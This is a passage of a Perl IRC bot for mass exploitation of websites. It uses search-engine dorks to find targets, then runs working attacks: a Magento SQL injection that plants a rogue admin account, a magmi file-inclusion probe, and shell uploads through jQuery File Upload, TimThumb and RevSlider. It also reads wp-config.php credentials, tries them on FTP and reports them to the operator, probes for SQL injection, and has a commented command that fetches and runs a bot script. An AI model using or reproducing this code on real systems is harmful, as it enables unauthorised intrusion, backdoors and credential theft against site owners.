} else { &type($chan,$bug,$dork,"MW",$type); } exit; } } if ($engine =~ /MX/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MX",$type); } exit; } } if ($engine =~ /MY/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MY",$type); } exit; } } if ($engine =~ /MZ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MZ",$type); } exit; } } if ($engine =~ /NA/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NA",$type); } exit; } } if ($engine =~ /NC/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NC",$type); } exit; } } if ($engine =~ /NE/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NE",$type); } exit; } } if ($engine =~ /NF/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NF",$type); } exit; } } if ($engine =~ /NG/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NG",$type); } exit; } } if ($engine =~ /NI/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NI",$type); } exit; } } if ($engine =~ /NL/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NL",$type); } exit; } } if ($engine =~ /NO/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NO",$type); } exit; } } if ($engine =~ /NP/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NP",$type); } exit; } } if ($engine =~ /NR/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NR",$type); } exit; } } if ($engine =~ /NU/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NU",$type); } exit; } } if ($engine =~ /NZ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NZ",$type); } exit; } } if ($engine =~ /OM/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"OM",$type); } exit; } } if ($engine =~ /PA/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PA",$type); } exit; } } if ($engine =~ /PE/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PE",$type); } exit; } } if ($engine =~ /PF/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PF",$type); } exit; } } if ($engine =~ /PG/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PG",$type); } exit; } } if ($engine =~ /PH/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PH",$type); } exit; } } if ($engine =~ /PK/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PK",$type); } exit; } } if ($engine =~ /PL/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PL",$type); } exit; } } if ($engine =~ /PM/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PM",$type); } exit; } } if ($engine =~ /PN/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PN",$type); } exit; } } if ($engine =~ /PR/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PR",$type); } exit; } } if ($engine =~ /PS/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PS",$type); } exit; } } if ($engine =~ /PT/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PT",$type); } exit; } } if ($engine =~ /PW/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PW",$type); } exit; } } if ($engine =~ /PY/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PY",$type); } exit; } } if ($engine =~ /QA/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"QA",$type); } exit; } } if ($engine =~ /RE/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"RE",$type); } exit; } } if ($engine =~ /RO/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"RO",$type); } exit; } } if ($engine =~ /RS/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"RS",$type); } exit; } } if ($engine =~ /RU/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"RU",$type); } exit; } } if ($engine =~ /RW/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"RW",$type); } exit; } } if ($engine =~ /SA/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SA",$type); } exit; } } if ($engine =~ /SB/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SB",$type); } exit; } } if ($engine =~ /SC/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SC",$type); } exit; } } if ($engine =~ /SD/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SD",$type); } exit; } } if ($engine =~ /SE/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SE",$type); } exit; } } if ($engine =~ /SG/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SG",$type); } exit; } } if ($engine =~ /SH/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SH",$type); } exit; } } if ($engine =~ /SI/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SI",$type); } exit; } } if ($engine =~ /SJ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SJ",$type); } exit; } } if ($engine =~ /SK/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SK",$type); } exit; } } if ($engine =~ /SL/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SL",$type); } exit; } } if ($engine =~ /SM/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SM",$type); } exit; } } if ($engine =~ /SN/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SN",$type); } exit; } } if ($engine =~ /SO/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SO",$type); } exit; } } if ($engine =~ /SR/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SR",$type); } exit; } } if ($engine =~ /SS/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SS",$type); } exit; } } if ($engine =~ /ST/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ST",$type); } exit; } } if ($engine =~ /SU/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SU",$type); } exit; } } if ($engine =~ /SV/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SV",$type); } exit; } } if ($engine =~ /SX/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SX",$type); } exit; } } if ($engine =~ /SY/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SY",$type); } exit; } } if ($engine =~ /SZ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SZ",$type); } exit; } } if ($engine =~ /TC/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TC",$type); } exit; } } if ($engine =~ /TD/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TD",$type); } exit; } } if ($engine =~ /TF/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TF",$type); } exit; } } if ($engine =~ /TG/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TG",$type); } exit; } } if ($engine =~ /TH/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TH",$type); } exit; } } if ($engine =~ /TJ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TJ",$type); } exit; } } if ($engine =~ /TK/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TK",$type); } exit; } } if ($engine =~ /TL/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TL",$type); } exit; } } if ($engine =~ /TM/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TM",$type); } exit; } } if ($engine =~ /TN/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TN",$type); } exit; } } if ($engine =~ /TO/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TO",$type); } exit; } } if ($engine =~ /TP/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TP",$type); } exit; } } if ($engine =~ /TR/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TR",$type); } exit; } } if ($engine =~ /TT/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TT",$type); } exit; } } if ($engine =~ /TV/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TV",$type); } exit; } } if ($engine =~ /TW/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TW",$type); } exit; } } if ($engine =~ /TZ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TZ",$type); } exit; } } if ($engine =~ /UA/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UA",$type); } exit; } } if ($engine =~ /UG/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UG",$type); } exit; } } if ($engine =~ /UK/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UK",$type); } exit; } } if ($engine =~ /US/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"US",$type); } exit; } } if ($engine =~ /UY/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UY",$type); } exit; } } if ($engine =~ /UZ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UZ",$type); } exit; } } if ($engine =~ /VA/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"VA",$type); } exit; } } if ($engine =~ /VC/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"VC",$type); } exit; } } if ($engine =~ /VE/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"VE",$type); } exit; } } if ($engine =~ /VG/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"VG",$type); } exit; } } if ($engine =~ /VI/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"VI",$type); } exit; } } if ($engine =~ /VN/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"VN",$type); } exit; } } if ($engine =~ /VU/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"VU",$type); } exit; } } if ($engine =~ /WF/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"WF",$type); } exit; } } if ($engine =~ /WS/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"WS",$type); } exit; } } if ($engine =~ /YE/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"YE",$type); } exit; } } if ($engine =~ /YT/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"YT",$type); } exit; } } if ($engine =~ /ZA/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ZA",$type); } exit; } } if ($engine =~ /ZM/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ZM",$type); } exit; } } if ($engine =~ /ZW/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ZW",$type); } exit; } } } ###### EXPLOITING ####### sub magmi_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$maglogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","1,1".&rainbow("$maglogo $engine Done ")); } my $vuln = "http".$site.$bug; my $cekftp = $vuln; $cekftp =~ s/http:\/\///; $cekftp =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { # my $check = &get_content($vuln); # &magmi_lfi($site,$chan,$engine); # if ($check =~ /dbname/i) { # my ($ftphost,$ftpuser,$ftppass,$ftpopen,$dbname,$dir); # if ($check =~ m/<\/host>/i){$ftphost=$1;} # if ($check =~ m/<\/username>/i){$ftpuser=$1;} # if ($check =~ m/<\/password>/i){$ftppass=$1;} # if ($check =~ m/<\/dbname>/i){$dbname=$1;} # if ($check =~ m/<\/frontName>/){$dir=$1;} # if ($check =~ m/(.+?)<\/active>/i){$ftpopen=$1;} # if ($ftphost =~ /127.0.0.1/) { $ftphost = $cekftp} # if ($ftphost =~ /localhost/i) { $ftphost = $cekftp} # &msg("$chan","1,1".&rainbow("$maglogo $engine <=> DataBase <=>")."9 http$site 15(Host: $ftphost) (User: $ftpuser) (Pass: $ftppass) (Dbname: $dbname) "); # &msg("$admin","$maglogo15 $engine 4<9=4>9 DataBase 4<9=4>9 http://$site 15 (Host: $ftphost) (User: $ftpuser) (Pass: $ftppass) (Dbname: $dbname) "); # if ($ftpopen =~ /1/){ # if ($ftpuser =~ /_/) { @userz = split(/_/,$ftpuser); $ftpuser = $userz[0]; } # my $success = 1; # use Net::FTP; # eval { # my $ftp = Net::FTP->new($ftphost, Debug => 0, Timeout => 5); # $success = 0 if $ftp->login($ftpuser,$ftppass); # $ftp->quit; # }; # if ($success == 0) { # &msg("$chan","1,1".&rainbow("[MagFTP] [ http://".$ftphost." ] [ ".$ftpuser." : ".$ftppass." ] Success ")); # } # } my $dir = "admin"; my $testmag = "http".$site.$dir."/"; my $magcek = &get_content($testmag); if ($magcek =~ /var loginForm = new varienForm\('loginForm'\)/) { my $postdata = 'filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTsNClNFVCBAU0FMVCA9ICdycCc7DQpTRVQgQFBBU1MgPSBDT05DQVQoTUQ1KENPTkNBVCggQFNBTFQgLCAnYm90MTIzJykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7DQpTRUxFQ1QgQEVYVFJBIDo9IE1BWChleHRyYSkgRlJPTSBhZG1pbl91c2VyIFdIRVJFIGV4dHJhIElTIE5PVCBOVUxMOw0KSU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgZmlyc3RuYW1lYCwgYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCxgcnBfdG9rZW5gLGBycF90b2tlbl9jcmVhdGVkX2F0YCkgVkFMVUVTICgnRmlyc3RuYW1lJywnTGFzdG5hbWUnLCdlbWFpbEBleGFtcGxlLmNvbScsJ2JvdHh4eCcsQFBBU1MsTk9XKCksMCwwLDEsQEVYVFJBLE5VTEwsIE5PVygpKTsNCklOU0VSVCBJTlRPIGBhZG1pbl9yb2xlYCAocGFyZW50X2lkLHRyZWVfbGV2ZWwsc29ydF9vcmRlcixyb2xlX3R5cGUsdXNlcl9pZCxyb2xlX25hbWUpIFZBTFVFUyAoMSwyLDAsJ1UnLChTRUxFQ1QgdXNlcl9pZCBGUk9NIGFkbWluX3VzZXIgV0hFUkUgdXNlcm5hbWUgPSAnYm90eHh4JyksJ0ZpcnN0bmFtZScpOw==%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1'; my $ceklogin = 'form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=botxxx&login%5Bpassword%5D=bot123'; my $crot = &magx($site.$dir,$postdata); if ($crot =~ /200 OK/) { # &msg("$chan","$maglogo15 $engine 4<9=4>15 Exploit 4<9=4>9 http$site "); my $crotx = &magxx($site.$dir,$ceklogin); if ($crotx =~ /302 Moved/) { &msg("$chan","1,1".&rainbow("$maglogo $engine Cek Login")."9 http".$site.$dir."/ 15[botxxx:bot123]"); } if ($crotx =~ /302 Found/) { &msg("$chan","1,1".&rainbow("$maglogo $engine Cek Login")."9 http".$site.$dir."/ 15[botxxx:bot123]"); } } } # } } exit; } } } } sub magx() { my $site = $_[0]; my $expl = $_[1]; my $url = "http".$site."/Cms_Wysiwyg/directive/index/"; my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(7); my $req = $ua->post($url, Content_Type =>'application/x-www-form-urlencoded', 'Accept-Encoding' => 'gzip, deflate', Content=> $expl); return $req->as_string; } sub magxx() { my $site = $_[0]; my $expl = $_[1]; my $url = "http".$site."/"; my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(7); my $req = $ua->post($url, Content_Type=>'application/x-www-form-urlencoded', 'Accept-Encoding' => 'gzip, deflate', Content=> $expl); return $req->as_string; } sub magmi_lfi() { my $site = $_[0]; my $chan = $_[1]; my $engine = $_[2]; my $bugs = "magmi/web/ajax_pluginconf.php?plugintype=utilities&pluginclass=CustomSQLUtility&file=../../../../../../../../../../../"; my $test = "http".$site.$bugs."proc/self/environ"; my $shell = "http".$site.$bugs."tmp/lobex"; my $html = &get_content($test); if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) { &msg("$chan","1,1".&rainbow("$maglogo $engine exploiting $site ")); my $res = &lfi_env_query($test); if ($res =~ /c0li#(.*?)#c0li(.*?)SUCCESS/) { my $os = $1; my $uid = $2; my $lficheck = &get_content($shell); if ($lficheck =~ /sEm - eXploit/){ &msg("$chan","1,1".&rainbow("$maglogo $engine <=> SheLL <=> $shell (OS=$os) $uid ")); } else { &msg("$chan","1,1".&rainbow("$maglogo $engine <=> Vuln <=> http$site (OS=$os) $uid ")); } } } } sub mjs_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = &search_engine($chan,$bug,$dork,$engine,$maglogo); my $num = scalar(@list); if ($num > 0) { foreach my $site (@list) { $count++; if ($count == $num-1) { &msg("$chan","1,1".&rainbow("$maglogo $engine Done ")); } my $vuln = "http".$site.$bug; my $shell; if ($pid = fork) { waitpid($pid,0); } else { if (fork) { exit; } else { my $expl = &injex($vuln,"files[]","bad.php"); if ($expl=~ /url\"\:\"(.*?)\",\"delete/) { $shell = $1; my $check = &get_content($shell); if ($check =~ /sEm - eXploit/){ my ($safe,$os,$uid); if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","1,1".&rainbow("$maglogo $engine <=> sHeLL <=>")."9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid "); } } } exit; } } } } sub injex() { my $target = $_[0]; my $code = $_[1]; my $file = $_[2]; my $browser = LWP::UserAgent->new; my $res = $browser->post($target,[ $code => ['./'.$file => $file => 'application/octet-stream']],'Content-type'=>'form-data'); my $hasil = $res->content; return $hasil; } sub tim_exploit() { my ($chan,$dork,$engine) = @_; my $count = 0; my @totexploit = &search_engine($chan,"",$dork,$engine,$timlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","1,1".&rainbow("$timlogo $engine Finished ")); } my ($timx,$crot); my $victim = "http".$site; my $target = &get_content($victim); if ($target =~ /src=\"(.*?)\.php\?src=/ig){ $timx = $1; } if ($timx =~ /^\//) { $timx = $victim.$timx; } my $vuln = $timx.".php?src=".$thumbid; my $vuln2 = $timx.".php?src=".$thumbid2; (my $bery = $timx.".php") =~ s{[^/]+\z}{}; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $cek = &get_content($vuln); if ($cek =~ /no mime type specified/) { $cek = &get_content($vuln2); $md5tim = $md5tim2; } if ($cek =~ /Unable to open image(.*?)$md5tim/){ my $crut = $1; if ($crut =~ /wp-content(.*)/) { $crot = "wp-content".$1; } if ($crut !~ /wp-content/ && $crut =~ /[\/|\\]\.[\/|\\](.*)/) { $crot = $1; } if ($crut !~ /wp-content/ && $crut =~ /[\/|\\]cache(.*)/) { $crot = "cache".$1; } if ($crut !~ /wp-content/ && $crut =~ /[\/|\\]temp(.*)/) { $crot = "temp".$1; } $crot =~ s/\\/\//; my $shell = $bery.$crot.$md5tim.".php"; my $shell2 = $victim.$crot.$md5tim.".php"; &msg("$chan","1,1".&rainbow("$timlogo $engine Checking")." 9http$site "); my $check = &get_content($shell); my $check2 = &get_content($shell2); if ($check =~ /sEm - eXploit/){ my ($safe,$os,$uid); if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","1,1".&rainbow("$timlogo $engine <=> sHeLL <=>")."9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid "); } elsif ($check2 =~ /sEm - eXploit/){ my ($safe,$os,$uid); if ($check2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check2 =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","1,1".&rainbow("$timlogo $engine <=> sHeLL <=>")."9 $shell215 (SafeMode=$safe) (OS=$os) uid=$uid "); } else { &msg("$chan","1,1".&rainbow("$timlogo $engine <=> Failed ")); } } } exit; } } } } sub tim_exploit2() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$timlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","1,1".&rainbow("$timlogo $engine Done")); } my $victim = "http".$site.$bug."?src=".$thumbid; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $cek = &get_content($victim); my $timx; if ($cek =~ /Unable to open image(.*?)wp-content(.*?)$md5tim/i){ my $crut = $2; my $shell = "http".$site."wp-content".$crut.$md5tim.".php"; &msg("$chan","1,1".&rainbow("$timlogo $engine Checking")." 9http$site "); my $check = &get_content($shell); if ($check =~ /sEm - eXploit/){ my ($safe,$os,$uid); if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","1,1".&rainbow("$timlogo $engine <=> sHeLL <=>")."9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid "); } } } exit; } } } } sub revslider_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$revlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","1,1".&rainbow("$revlogo $engine Done ")); } my $target = "http".$site.$bug; my $cekftp = $target; $cekftp =~ s/http:\/\///; $cekftp =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $check = &get_content($target."?action=revslider_show_image&img=../wp-config.php"); if ($check =~ /define\('DB_USER'/) { my ($host,$user,$pass,@userz); if ($check =~ /define\('DB_HOST', '(.*)'\);/) { $host = $1; } if ($check =~ /define\('DB_USER', '(.*)'\);/) { $user = $1; } if ($check =~ /define\('DB_PASSWORD', '(.*)'\);/) { $pass = $1; } if ($host =~ /127.0.0.1/) { $host = $cekftp} if ($host =~ /localhost/i) { $host = $cekftp} if ($user =~ /_/) { @userz = split(/_/,$user); $user = $userz[0]; } my $success = 1; use Net::FTP; eval { my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5); $success = 0 if $ftp->login($user,$pass); $ftp->quit; }; if ($success == 0) { &msg("$chan","1,1".&rainbow("$revlogo-[$engine]- cPanel sent to $admin ")); &msg("$admin","1,1".&rainbow("$revlogo-[$engine]- FTP http://".$host." [".$user.":".$pass."] Success ")); } my $aplod = LWP::UserAgent->new; $aplod->timeout($timot); my $res = $aplod->post($target, Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]); my $hasil = $res->as_string; if ($hasil =~ m/wp-content(.*)revslider.php/g) { my $folder = $1; $folder =~ s/\\/\//g; my $shell = "http".$site."wp-content".$folder."up.php"; &msg("$chan","1,1".&rainbow("$revlogo-[$engine]- Exploiting http$site ")); # &get_content($shell."?cmd=curl+-C+-+-O+".$botxx."%3Bperl+bot.txt%3Brm+bot.txt"); my $check = &get_content($shell); if ($check =~ /sEm - eXploit/){ my ($safe,$os,$uid); if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","1,1".&rainbow("$revlogo-[$engine]- sHeLL")."9 $shell 15SafeMod=$safe $os uid=$uid "); } else { &msg("$chan","1,1".&rainbow("$revlogo-[$engine]- Shell Upload Failed ")); } } } } exit; } } } } sub sql_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$sqllogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","1,1".&rainbow("$sqllogo $engine Finished for $dork ")); } my $test = "http".$site.$bug."1'"; my $sqlsite = "http".$site.$bug."1"; my $html = &get_content($test);sleep(1); if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) { &sqlbrute($sqlsite,$chan,$engine);sleep(1); } elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) { &sqlbrute($sqlsite,$chan,$engine);sleep(1); } elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) { &sqlbrute($sqlsite,$chan,$engine);sleep(1); } elsif ($html 